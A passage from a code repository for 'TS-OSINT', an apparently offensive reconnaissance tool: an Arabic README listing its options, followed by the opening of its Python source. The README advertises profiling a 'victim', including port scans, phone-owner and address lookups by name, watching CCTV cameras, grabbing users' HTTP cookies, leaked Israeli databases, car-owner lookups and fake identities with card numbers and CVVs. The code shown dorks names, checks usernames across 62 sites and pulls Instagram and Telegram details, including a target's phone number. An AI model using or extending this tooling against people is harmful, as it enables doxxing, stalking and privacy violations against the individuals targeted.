الـIP بصيغة Hex 196 | - الـIPV6 197 | - الخيار 6 : ينقسم لـ3 أقسام : 198 | - القسم الأول : استخراج معلومات تفصيلية عن الشبكات المتصلة بالجهاز حاليا 199 | - القسم الثاني : استخراج العمليات الشبكية الجارية 200 | - القسم الثالث : جلب موقع الشبكة وإمكانية إظهار موقعها بخرائط Google 201 | - الخيار 7 : استخراج المعلومات الآتية للصور 202 | - اسم الجهاز الذي صور الصورة 203 | - تشفير الصورة 204 | - الـExifOffset 205 | - الـSubsecTimeOriginal 206 | - تاريخ التقاط الصورة بالسنة والشهر واليوم والساعة والدقيقة والثانية وأجزاء الثانية 207 | - فئة الصورة 208 | - المدينة الطبيعية 209 | - نوع الصورة 210 | - القارة 211 | - الدولة 212 | - رمز الدولة 213 | - المقاطع 214 | - رمز المقاطعة 215 | - الاتحاد السياسي 216 | - السكك الحديدية 217 | - الطريق 218 | - الولاية 219 | - القرية 220 | - الطريق السريع 221 | - رابط موقع تصوير الصورة بخرائط Google 222 | - الخيار 8 : ينقسم لقسمين : 223 | - القسم الأول : استخراج المعلومات الآتية لأرقام الهاتف العالمية 224 | - موقع الرقم 
225 | - المنطقة الزمنية 226 | - شركة الاتصالات 227 | - القسم الثاني : البحث عن المعلومات الآتية عبر إدخال اسم الشخص، هذا الخيار متوفر لكل دول العالم 228 | - رقم الهاتف 229 | - اسم الشخص 230 | - رمز الدولة 231 | - عنوان الشخص 232 | - الخيار 9 : استخراج منصات التواصل الاجتماعي المسجل بها البريد الإلكتروني للضحية، حاليا توجد 3 منصات 233 | - الخيار 10 : محرك بحث Google، تستطيع البحث عن أي شيء تريده وتحديد عدد نتائج البحث 234 | - الخيار 11 : فحص منافذ جهاز الضحية واستخراج المفتوحة منها 235 | - الخيار 12 : أشهر محركات بحث Deep & Dark Web 236 | - الخيار 13 : ينقسم لقسمين 237 | - القسم الأول : مراقبة كاميرات 94 دولة حول العالم 238 | - القسم الثاني : مراقبة كاميرات متواجدة بـ53 مكان حول العالم 239 | - الخيار 14 : تطبيق مفهوم الـWebScraping (استخراج محتويات الموقع مثل المسارات والملفات والصور إلخ...) 240 | - الخيار 15 : جلب ملفات الكوكيز للمستخدمين بمواقع بروتوكول Http 241 | - الخيار 16 : قواعد بيانات إسرائيلية مسربة 242 | - الخيار 17 : التحقق من إذا كانت كلمة سرك مسربة أو لا 243 | - الخيار 18 : فحص المواقع الإلكترونية عن الثغرات، ويتم الفحص عن 16 ثغرة 244 | - الخيار 19 : جلب عنوان الـMac لجهاز المستخدم 245 | - الخيار 20 : التحقق من تسرب البطاقة البنكية للمستخدم 246 | - الخيار 21 : فحص الروابط من البرمجيات الخبيثة 247 | - الخيار 22 : إنشاء المعلومات الشخصية ااوهمية الآتية مع إمكانية تحديد اللغة والدولة وتتوفر حاليا أغلب اللغات ودول العالم 248 | - الاسم 249 | - العمر 250 | - تاريخ المبلاد 251 | - عنوان السكن 252 | - رقم الهاتف 253 | - البريد الإلكتروني 254 | - نوع الهاتف 255 | - الحالة الاجتماعية 256 | - الوظيفة إذا كان موظف 257 | - الشركة إذا كان موظف 258 | - الـIPv4 العام 259 | - الـIPv4 الخاص 260 | - الـIPv6 261 | - عنوان الـMac 262 | - عنوان بطاقة الشبكة (NIC) 263 | - الـBBAN 264 | - الـIBAM 265 | - جهة البطاقة البنكية 266 | - رقم البطاقة البنكية 267 | - رمز الآمان للبطاقة البنكية 268 | - تاربخ انتهاء البطاقة البنكية 269 | - رقم الـSwift للبنك 270 | - الرصيد المالي 271 | - رقم جواز السفر 272 | - تاريخ جواز السفر 273 | - اسم السيارة ولونها 274 | - رقم لوحة السيارة 275 | - رقم هيكل السيارة 276 | - اللون المفضل 277 | - الطعام المفضل 278 | - الخيار 23 : ادخال كلمة مفتاحية لإنشاء هاشتاقات منها، تفيد صنَّاع المحتوى 279 | - الخيار 24 : استخراج لوحات تسجيل الدخول من المواقع الإلكترونية 280 | - الخيار 25 : استخراج معلومات السيارة ومالكها باسم اللوحة، وهذا الخيار متوفر للدول الآتية : 🇮🇱 281 | - الخيار 97 : تحديث الأداة 282 | - الخيار 98 : الإبلاغ عن ثغرة بالأداة 283 | - الخيار 99 : طلب مساعدة 284 | - الخيار 00 : الخروج من الأداة 285 | 286 | ### ملاحظات ⚠️ 287 | - الخيار 3 منصة Telegram ستحتاج لمعرّف الـAPI والـAPI hash وهذه تحصل عليها من [هنا](https://my.telegram.org/apps) 288 | - الخيار 3 منصة Telegram سيتم إنشاء ملف اسمه session_name.session لا عليك منه 289 | - الخيار 3 منصة Reddit ستحتاج للـClient ID والـClient secert والـUser agent وهذه تحصل عليها من [هنا](https://www.reddit.com/prefs/apps/) 290 | - الخيار 3 منصة Tellonym لا يعمل على الهواتف 291 | - الخيار 3 منصة Sony ستحتاج لـNpsso وهذا تحصل عليه بعد تسجيل الدخول بالموقع الرسمي للمنصة ثم الدخول [هنا](https://ca.account.sony.com/api/v1/ssocookie) 292 | - الخيار 6 القسم الثالث يجب أن تسجل دخول بهذا [الموقع](https://www.mylnikov.org/) 293 | - الخيار 7 يجب أن تحدد الصور المصورة من الكاميرا مباشرة فقط 294 | - الخيار 7 قد تكون المعلومات من (تاريخ التقاط الصورة...~رابط موقع تصوير...) 
غير دقيقة/صحيحة وهذا بسبب محتوى الصورة أولا وثانيا من المكتبة PIL المستخدمة 295 | - الخيار 10 سيتم إنشاء ملف اسمه .google-cookie لا عليك منه 296 | - الخيار 14 اسم المجلد هو Downloaded images 297 | -------------------------------------------------------------------------------- /TS-OSINT.py: -------------------------------------------------------------------------------- 1 | try: 2 | import os, requests, instaloader, urllib.parse, json, time, sys, praw, socket, ipaddress, platform, psutil, subprocess, shutil, PIL.Image, PIL.ExifTags, cv2, pycountry, concurrent.futures, hashlib, faker, random, numpy 3 | from instaloader import Instaloader 4 | from rich.console import Console; from rich.table import Table 5 | from telethon.sync import TelegramClient 6 | from datetime import datetime 7 | from selenium.webdriver.chrome.options import Options; from selenium.webdriver.common.by import By; from selenium import webdriver 8 | from psnawp_api import PSNAWP 9 | from binascii import hexlify 10 | from PIL import Image; from PIL.ExifTags import TAGS, GPSTAGS 11 | import phonenumbers; from phonenumbers import geocoder, carrier, timezone 12 | from TrackCobra import Valid 13 | from googlesearch import search 14 | from search_engines import Google, Bing, Brave 15 | from bs4 import BeautifulSoup 16 | from http.cookiejar import CookieJar 17 | from tabulate import tabulate 18 | from io import BytesIO 19 | except ModuleNotFoundError: 20 | os.system("pip install requests praw ipaddress psutil pillow opencv-python selenium rich phonenumbers bs4 telethon TrackCobra googlesearch-python tabulate") 21 | 22 | os.system("clear") 23 | 24 | Black = "\033[1;30m" 25 | Red = "\033[1;31m" 26 | Green = "\033[1;32m" 27 | Yellow = "\033[1;33m" 28 | Blue = "\033[1;34m" 29 | Purple = "\033[1;35m" 30 | Cyan = "\033[1;36m" 31 | White = "\033[1;37m" 32 | Gray = "\033[1;39m" 33 | DarkRed = "\033[2;31m" 34 | DarkBlue = "\033[2;34m" 35 | DarkPink = "\033[2;35m" 36 | DarkCyan = "\033[2;36m" 37 | 38 | print(f"""{Blue} 39 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢢⠀⠀⠀⢢⠀⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 40 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡀⠀⢣⡀⠀⠀⠀⢣⢀⠀⠘⡆⢸⡀⠀⢢⠀⠀⠀⢠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 41 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢄⠑⣄⠀⢻⠀⠀⠀⠘⡌⡆⠀⡇⢸⡇⠀⢸⡀⡆⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀ 42 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⠼⣷⠼⡦⣼⣯⣧⣀⢰⡇⡇⢰⠇⣼⢳⠀⢸⡇⡇⠀⢸⡇⠀⡄⠀⢰⠀⠀⠀⠀⠀ 43 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠿⠛⢉⡈⢧⡀⣸⡆⣇⣿⠃⣿⢀⣿⣻⢷⣿⣴⣇⡿⢀⣾⢠⡇⢀⣿⠀⢰⠃⠀⡜⠀⠀⠀⠀⠀ 44 | ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⡿⠋⢡⡀⠙⣦⠹⣎⣧⣿⣿⣿⣿⣼⣿⣿⣿⣿⣿⣾⣿⣿⣳⣿⣧⡿⣠⣾⡿⢀⢎⠀⡼⢁⠂⠀⡐⠀⠀ 45 | ⠀⠀⠀⠀⠀⠀⢀⣴⠟⠉⠀⠀⢠⠹⣿⣾⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣵⡷⣫⣾⠞⣡⠏⣠⡞⠀⣠⡆ 46 | ⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠠⣱⣄⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣷⣾⣯⣶⣿⡿⠃ 47 | ⠀⠀⠀⠀⣴⠟⠁⠀⢤⡱⣄⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⣿⣿⡿⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠉⠀⠀ 48 | ⠀⠀⠀⣼⠋⠀⠀⣝⢦⣿⣿⣿⣿⣿⣿⣿⠿⢿⣿⣿⣿⣿⣷⣂⡙⣿⣿⡇⠀⠀⠀⠀⠀⠈⢉⣿⣿⣿⣿⣿⣿⠿⢿⣄⠀⠀⠀⠀⠀ 49 | ⠀⠀⣼⠃⠀⠀⠤⣬⣿⣿⣿⣿⣿⡉⣿⣿⣄⣼⣿⣿⣿⣿⡟⠉⠀⢿⣿⡿⠀⠀⠀⠀⠀⢠⣾⣿⠿⠿⠿⠿⣟⡳⠄⠉⠀⠀⠀⠀⠀ 50 | ⠀⣸⠃⠀⠀⢀⣾⣿⣿⠟⠋⢿⣥⡬⠙⣿⣿⣿⣿⣿⣿⡧⠀⠀⢲⣄⣿⠇⠀⠀⠀⢀⣴⣿⣿⣿⡿⣛⣓⠲⢤⡉⠀⠀⠀⠀⠀⠀⠀ 51 | ⢰⠃⠀⠀⣠⣿⣿⠟⠁⠀⠀⠘⢿⣔⣢⡴⠛⠙⠛⠛⢁⠀⢠⣾⣦⣿⠏⠀⠀⢀⣴⣿⣿⣿⣯⡭⢍⡒⢌⠙⠦⡈⢢⡀⠀⠀⠀⠀⠀ 52 | ⠁⠀⠀⣰⣿⡿⠁⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣄⣴⣷⣾⣷⣤⣿⠟⠁⠀⣠⣴⣿⣿⣿⣿⣾⣍⡻⡄⠈⠳⡅⠀⠈⠂⠀⠀⠀⠀⠀⠀ 53 | ⠀⠀⣼⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠛⠉⠉⣀⣠⣶⣿⣿⣿⣿⣿⡿⢿⣿⣮⠙⢦⠀⠀⠈⠆⠀⠀⠀⠀⠀⠀⠀⠀ 54 | ⠀⣸⠟⠁⠀⢀⣠⣤⣶⡶⢶⣶⣶⣦⣤⣤⣤⣤⣤⣶⣶⣾⣿⣿⣿⡿⢿⡿⣝⢫⡻⣍⠳⣝⢻⢧⠀⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 55 | ⣰⠋⢀⣴⠞⠋⠉⠠⠋⠠⢋⠞⣹⢻⠏⢸⠉⡏⡿⢹⢿⢻⣿⢿⣿⡿⣦⠹⡈⠳⡘⡈⢣⠘⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 56 | ⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠈⠀⠃⠀⠀⠘⠀⠀⡇⡜⠈⡸⢸⠀⢹⢸⠈⢆⠁⠀⢱⠁⠀⢇⠸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 57 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠘⠀⠘⠀⠀⢸⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 58 | 59 | {Green}v5.1.6{White} 60 | 61 | THIS TOOL WAS PROGRAMMED BY TLER AL-SHAHRANI. 
62 | PERSONAL WEBSITE : {Blue}https://tlersa.github.io/tleralshahrani/Index.html""") 63 | print(f"{White}- "*50) 64 | 65 | def main_menu(): 66 | print(f"""{White}[{Blue}01{White}] - Dorks [{Blue}11{White}] - Ports Scan [{Blue}21{White}] - Scan Links For Malwares 67 | [{Blue}02{White}] - Search For Username [{Blue}12{White}] - Deep & Dark Web [{Blue}22{White}] - Create Fake Personal Info 68 | [{Blue}03{White}] - Usernames OSINT [{Blue}13{White}] - CCTV [{Blue}23{White}] - Create Hashtags 69 | [{Blue}04{White}] - Domains OSINT [{Blue}14{White}] - WebScraping [{Blue}24{White}] - Extract Login Panels 70 | [{Blue}05{White}] - IP's OSINT [{Blue}15{White}] - Get Http Cookies [{Blue}25{White}] - Cars OSINT 71 | [{Blue}06{White}] - Networks OSINT [{Blue}16{White}] - Israeli Databases \U0001F923 72 | [{Blue}07{White}] - MetaData [{Blue}17{White}] - Check Passwords Leakage 73 | [{Blue}08{White}] - PhoneNumbers OSINT [{Blue}18{White}] - Scan Websites For Bugs 74 | [{Blue}09{White}] - Emails OSINT [{Blue}19{White}] - Get MacAddress 75 | [{Blue}10{White}] - Search Engine [{Blue}20{White}] - Bank Cards OSINT 76 | 77 | [{Blue}97{White}] - Update 78 | [{Blue}98{White}] - Report A Bug 79 | [{Blue}99{White}] - Help 80 | [{Blue}00{White}] - Exit""") 81 | 82 | def submenu1(): 83 | print(f"""{White}[{Blue}01{White}] - Instagram 84 | [{Blue}02{White}] - Telegram Accs 85 | [{Blue}03{White}] - TikTok 86 | [{Blue}04{White}] - Github 87 | [{Blue}05{White}] - Reddit 88 | [{Blue}06{White}] - Tellonym 89 | [{Blue}07{White}] - Sony 90 | 91 | [{Blue}99{White}] - Back""") 92 | 93 | def submenu2(): 94 | print(f"""{White}[{Blue}01{White}] - PhoneNumbers OSINT 95 | [{Blue}02{White}] - Search For The Owner Of The PhoneNumber By Name 96 | 97 | [{Blue}99{White}] - Back""") 98 | 99 | def submenu3(): 100 | print(f"""{White}[{Blue}01{White}] - Networks OSINT 101 | [{Blue}02{White}] - Show Network Operations 102 | [{Blue}03{White}] - Extract The Location 103 | 104 | [{Blue}99{White}] - Back""") 105 | 106 | def submenu4(): 107 | print(f"""{White}[{Blue}01{White}] - Cameras Around The World 108 | [{Blue}02{White}] - Cameras Of Places 109 | 110 | [{Blue}99{White}] - Back""") 111 | 112 | def submenu5(): 113 | print(f"""{White}[{Blue}01{White}] - My acc info 114 | [{Blue}02{White}] - Osint for user by username 115 | [{Blue}03{White}] - Osint for user by userID 116 | 117 | [{Blue}99{White}] - Back""") 118 | 119 | def handle_selection(selection): 120 | def another_operation(): 121 | ao = input(f"\n{White}Would u like another operation? 
({Blue}Y{White}/{Blue}N{White}) {Blue}") 122 | if ao == "Y" or ao == "y" or ao == "Yes" or ao == "yes" or ao == "YES": main_menu() 123 | elif ao == "N" or ao == "n" or ao == "No" or ao == "no" or ao == "No": exit(f"{White}") 124 | else: print(f"{Red}Please choose a correct option!{White}") 125 | 126 | if selection == "1" or selection == "01" or selection == "Dorks" or selection == "DORKS" or selection == "dorks": 127 | class dorks(): 128 | def __init__(self): 129 | self.fristname = None 130 | self.FName = None 131 | self.GFName = None 132 | self.lastname = None 133 | self.output = "" 134 | self.admin() 135 | 136 | def set_info(self): 137 | fristname = input(f"{White}[{Blue}+{White}] FristName/Nickname : {Blue}") 138 | FName = input(f"{White}[{Blue}+{White}] Father name : {Blue}") 139 | GFName = input(f"{White}[{Blue}+{White}] GrandFather name : {Blue}") 140 | lastname = input(f"{White}[{Blue}+{White}] Last/Family/Tribe name : {Blue}") 141 | 142 | if fristname == "" or fristname == " ": self.fristname = False 143 | else: self.fristname = fristname 144 | 145 | if FName == "" or FName == " ": self.FName = False 146 | else: self.FName = FName 147 | 148 | if GFName == "" or GFName == " ": self.GFName = False 149 | else: self.GFName = GFName 150 | 151 | if lastname == "" or lastname == " ": self.lastname = False 152 | else: self.lastname = lastname 153 | 154 | if self.FName and self.fristname and self.GFName and self.lastname is None: 155 | input(f"{Red}Please add at least fristname!{White}") 156 | exit() 157 | 158 | def admin(self): 159 | self.set_info() 160 | print(f"\n{White}[ Searching in internet browsers... ]") 161 | space = " " 162 | time.sleep(3) 163 | 164 | if self.fristname: 165 | sql = self.fristname + space 166 | self.search_google(sql) 167 | self.search_bing(sql) 168 | self.search_brave(sql) 169 | 170 | if self.fristname and self.FName: 171 | sql = self.fristname + space + self.FName 172 | self.search_google(sql) 173 | self.search_bing(sql) 174 | self.search_brave(sql) 175 | 176 | if self.fristname and self.GFName: 177 | sql = self.fristname + space + self.GFName 178 | self.search_google(sql) 179 | self.search_bing(sql) 180 | self.search_brave(sql) 181 | 182 | if self.fristname and self.lastname: 183 | sql = self.fristname + space + self.lastname 184 | self.search_google(sql) 185 | self.search_bing(sql) 186 | self.search_brave(sql) 187 | 188 | if self.fristname and self.FName and self.lastname: 189 | sql = self.fristname + space + self.FName + space + self.lastname 190 | self.search_google(sql) 191 | self.search_bing(sql) 192 | self.search_brave(sql) 193 | 194 | if self.fristname and self.GFName and self.lastname: 195 | sql = self.fristname + space + self.GFName + space + self.lastname 196 | self.search_google(sql) 197 | self.search_bing(sql) 198 | self.search_brave(sql) 199 | 200 | if self.fristname and self.FName and self.GFName and self.lastname: 201 | sql = self.fristname + space + self.FName + space + self.GFName + space + self.lastname 202 | self.search_google(sql) 203 | self.search_bing(sql) 204 | self.search_brave(sql) 205 | 206 | self.save() 207 | 208 | def add_info(self, link, title, text, _from): self.output += f"""[-] Link : {link} 209 | [-] Title : {title} 210 | [-] Text : {text} 211 | [-] From : {_from}\n\n""" 212 | 213 | def search_google(self, sql): 214 | time.sleep(0.5) 215 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in google? 
{Blue}")) 216 | engine = Google() 217 | results = engine.search(sql, pages=number_of_pages) 218 | seen = set() 219 | for data in results.__dict__['_results']: 220 | text = data['text'] 221 | if text not in seen: 222 | link = data['link'] 223 | title = data['title'] 224 | self.add_info(link, title, text, "Google") 225 | seen.add(text) 226 | print(f"{White}[{Green}✓{White}] Done Search in Google") 227 | 228 | def search_bing(self, sql): 229 | time.sleep(0.5) 230 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in bing? {Blue}")) 231 | engine = Bing() 232 | results = engine.search(sql, pages=number_of_pages) 233 | seen = set() 234 | for data in results.__dict__['_results']: 235 | text = data['text'] 236 | if text not in seen: 237 | link = data['link'] 238 | title = data['title'] 239 | self.add_info(link, title, text, "Google") 240 | seen.add(text) 241 | print(f"{White}[{Green}✓{White}] Done Search in Bing") 242 | 243 | def search_brave(self, sql): 244 | time.sleep(0.5) 245 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in brave? {Blue}")) 246 | engine = Brave() 247 | results = engine.search(sql, pages=number_of_pages) 248 | seen = set() 249 | for data in results.__dict__['_results']: 250 | text = data['text'] 251 | if text not in seen: 252 | link = data['link'] 253 | title = data['title'] 254 | self.add_info(link, title, text, "Google") 255 | seen.add(text) 256 | print(f"{White}[{Green}✓{White}] Done Search in Brave") 257 | 258 | def save(self): 259 | with open(f"Dorks results.txt", "wt", encoding="utf-8") as F: F.write(self.output) 260 | F.close() 261 | print(f"\n{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\Dorks results.txt{White}") 262 | dorks() 263 | elif selection == "2" or selection == "02" or selection == "Search For Username" or selection == "SEARCH FOR USERNAME" or selection == "search for username": 264 | try: 265 | def search_social_media(username): 266 | websites = { 267 | "FaceBook": f"https://www.facebook.com/public/{username}/", 268 | "Instagram": f"https://instagram.com/{username}/", 269 | "YouTube": f"https://www.youtube.com/@{username}/", 270 | "TikTok": f"https://www.tiktok.com/@{username}/", 271 | "SnapChat": f"https://www.snapchat.com/add/{username}/", 272 | "Telegram": f"https://t.me/{username}/", 273 | "Spotify": f"https://open.spotify.com/user/{username}/", 274 | "X": f"https://twitter.com/{username}/", 275 | "Pinterest": f"https://in.pinterest.com/{username}/", 276 | "Reddit": f"https://www.reddit.com/user/{username}/", 277 | "Tumblr": f"https://tumblr.com/{username}/", 278 | "Google+": f"https://plus.google.com/s/{username}/top/", 279 | "Weibo": f"https://weibo.com/u/{username}/", 280 | "Badoo": f"https://www.badoo.com/en/{username}/", 281 | "Behance": f"https://www.behance.net/{username}/", 282 | "Dribbble": f"https://dribbble.com/{username}/", 283 | "Kuaishou": f"https://www.kuaishou.com/profile/{username}/", 284 | "YY": f"https://www.yy.com/u/{username}/", 285 | "Quora": f"https://www.quora.com/profile/{username}/", 286 | "Tieba Baidu": f"https://tieba.baidu.com/f?kw={username}/", 287 | "Imgur": f"https://imgur.com/user/{username}/", 288 | "PayPal": f"https://www.paypal.com/paypalme/{username}/", 289 | "Vimeo": f"https://vimeo.com/{username}/", 290 | "Discord": f"https://discord.gg/{username}/", 291 | "Likee": f"https://l.likee.video/p/{username}/", 292 | "PicsArt": f"https://picsart.com/{username}/", 293 | "Twitch": 
f"https://www.twitch.tv/{username}/", 294 | "Linkedin": f"https://www.linkedin.com/in/{username}/", 295 | "Threads": f"https://www.threads.net/@{username}/", 296 | "Medium": f"https://medium.com/@{username}/", 297 | "Stack Exchange": f"https://academia.stackexchange.com/users/{username}/", 298 | "Wattpad": f"https://www.wattpad.com/user/{username}/", 299 | "SoundCloud": f"https://soundcloud.com/{username}/", 300 | "Deviantart": f"https://www.deviantart.com/{username}/", 301 | "YuboLive": f"https://www.deviantart.com/{username}/", 302 | "Tinder": f"https://tinder.com/app/profile/{username}/", 303 | "Wordpress": f"https://wordpress.com/{username}/", 304 | "NextDoor": f"https://nextdoor.com/profile/{username}/", 305 | "Triller": f"https://triller.co/@{username}/", 306 | "Flickr": f"https://www.flickr.com/people/{username}/", 307 | "Foursquare": f"https://foursquare.com/user/{username}/", 308 | "Steam": f"https://steamcommunity.com/id/{username}/", 309 | "Roblox": f"https://www.roblox.com/user.aspx?username={username}/", 310 | "Fotolog": f"https://fotolog.com/{username}/", 311 | "Gaiaonline": f"https://www.gaiaonline.com/profiles/{username}/", 312 | "Myspace": f"https://myspace.com/{username}/", 313 | "Replit": f"https://replit.com/@{username}/", 314 | "Tagged": f"https://www.tagged.com/{username}/", 315 | "Mixi": f"https://mixi.jp/view_community.pl?id= {username}/", 316 | "Crunchyroll": f"https://www.crunchyroll.com/{username}/", 317 | "Meetup": f"https://www.meetup.com/{username}/", 318 | "Tellonym": f"https://tellonym.me/{username}/", 319 | "Pastebin": f"https://pastebin.com/u/{username}/", 320 | "Github": f"https://github.com/{username}/", 321 | "Gitlab": f"https://gitlab.com/{username}/", 322 | "Wikipedia": f"https://www.wikipedia.org/wiki/User:{username}/", 323 | "Udemy": f"https://www.udemy.com/user/{username}/", 324 | "Canva": f"https://www.canva.com/{username}/", 325 | "Payhip": f"https://payhip.com/{username}", 326 | "Portswigger": f"https://portswigger.net/users//{username}", 327 | "DokanTip": f"https://tip.dokan.sa/{username}/", 328 | "Harmash": f"https://harmash.com/users/{username}/", 329 | "EXPO ReactNative": f"https://expo.dev/accounts/{username}" } 330 | 331 | found_sites = [] 332 | for site, url in websites.items(): 333 | response = requests.get(url) 334 | if response.status_code == 200: 335 | time.sleep(0.5) 336 | print(f"{White}[{Green}✓{White}] {site} : Found - {Yellow}{url}") 337 | found_sites.append(f"{site} : {url}") 338 | else: print(f"{White}[{Red}X{White}] {site} Not Found") 339 | 340 | print(f"\n{White}[{Green}✓{White}] Done search in 62 social media!") 341 | 342 | return found_sites 343 | 344 | def save_results(results): 345 | with open(f"search_social_media_results.txt", "wt") as F: 346 | for i, result in enumerate(results, start=1): F.write(f"{i}- {result}\n") 347 | F.close() 348 | print(f"{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\search social media results.txt{White}") 349 | 350 | username = input(f"{White}[{Blue}+{White}] Enter username/nickname target : {Blue}@") 351 | print(f"{White}Search for {Blue}@{username}{White} in") 352 | time.sleep(1) 353 | 354 | results = search_social_media(username) 355 | 356 | save_to_file = input(f"\n{White}Do you want to save it to a file? 
({Blue}Y{White}/{Blue}N{White}) {Blue}") 357 | if save_to_file == "Y" or save_to_file == "y" or save_to_file == "Yes" or save_to_file == "yes" or save_to_file == "YES": save_results(results) 358 | elif save_to_file == "N" or save_to_file == "n" or save_to_file == "No" or save_to_file == "no" or save_to_file == "No": exit() 359 | else: print(f"{Red}Please choose a correct option!{White}") 360 | except BaseException as msg: print(f"{Red}E : {msg}") 361 | elif selection == "3" or selection == "03" or selection == "Usernames OSINT" or selection == "usernames OSINT" or selection == "USERNAMES OSINT" or selection == "usernames osint": 362 | submenu1() 363 | user_input = input(f"Choose : {Blue}") 364 | 365 | if user_input == "1" or user_input == "01" or user_input == "Instagram" or user_input == "INSTAGRAM" or user_input == "intagram" or user_input == "Insta" or user_input == "INSTA" or user_input == "insta": 366 | x = Instaloader() 367 | 368 | username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 369 | 370 | print(f"{White}Getting info...") 371 | time.sleep(3) 372 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 373 | time.sleep(1) 374 | 375 | f = instaloader.Profile.from_username(x.context, username) 376 | 377 | try: 378 | print(f""" 379 | ┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ 380 | ┃ Info ┃ Acc ┃ 381 | ┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ 382 | │ ID │ {f.userid} 383 | │ Is business acc? │ {"Yes" if f.is_business_account else "No"} 384 | │ Business category name │ {f.business_category_name} 385 | │ Is verified acc? │ {"Yes" if f.is_verified else "No"} 386 | │ Is private acc? │ {"Yes" if f.is_private else "No"} 387 | │ Username │ @{f.username} 388 | │ Nickname │ {f.full_name} 389 | │ Avater │ {f.profile_pic_url} 390 | │ Followers │ {f.followers} 391 | │ Following │ {f.followees} 392 | │ Followed by viewer │ {f.followed_by_viewer} 393 | │ Follows by viewer │ {f.follows_viewer} 394 | │ Has blocked viewer │ {f.has_blocked_viewer} 395 | │ Posts │ {f.mediacount} 396 | │ IGTV videos │ {f.igtvcount} 397 | │ Has public stories? │ {f.has_public_story} 398 | │ Has viewable stories? │ {f.has_viewable_story} 399 | │ Has highlight? │ {f.has_highlight_reels} 400 | │ Bio │ {f.biography} 401 | │ Bio link │ {f.external_url} 402 | │ Has requested viewer? │ {f.has_requested_viewer} 403 | │ Has requested by viewer? 
│ {f.requested_by_viewer} 404 | └──────────────────────────┴──────────────────────────────────────────────────────────────────────────────┘""") 405 | except BaseException as msg: print(f"{Red}E : {msg}") 406 | 407 | elif user_input == "2" or user_input == "02" or user_input == "Telegram" or user_input == "TELEGRAM" or user_input == "telegram" or user_input == "Tele" or user_input == "TELE" or user_input == "tele": 408 | api_id = input(f"{White}[{Blue}+{White}] - Enter your API ID : {Blue}") 409 | api_hash = input(f"{White}[{Blue}+{White}] - Enter your API hash : {Blue}") 410 | 411 | client = TelegramClient("session_name", api_id, api_hash) 412 | 413 | async def main(): 414 | await client.start() 415 | username = input(f"{White}[{Blue}+{White}] - Enter username/phonenumber target : {Blue}@") 416 | 417 | print(f"{White}Getting info...") 418 | time.sleep(3) 419 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 420 | time.sleep(1) 421 | 422 | try: 423 | username = await client.get_entity(username) 424 | 425 | table = Table(title="") 426 | table.add_column("Info", no_wrap=True) 427 | table.add_column("Acc") 428 | table.add_row("ID", str(username.id)) 429 | table.add_row("Username", str("@"+username.username)) 430 | table.add_row("Fristname", str(username.first_name)) 431 | table.add_row("Lastname", str(username.last_name)) 432 | table.add_row("Phonenumber", str(username.phone)) 433 | Console().print(table, justify="left") 434 | except BaseException as mag: print(f"{Red}E : {mag}") 435 | 436 | await client.disconnect() 437 | 438 | if __name__ == '__main__': 439 | import asyncio 440 | asyncio.run(main()) 441 | elif user_input == "3" or user_input == "03" or user_input == "TikTok" or user_input == "TIKTOK" or user_input == "tiktok" or user_input == "Tik" or user_input == "TIK" or user_input == "tik": 442 | class Tik: 443 | def __init__(self, username: str): 444 | self.username = username 445 | self.json_data = None 446 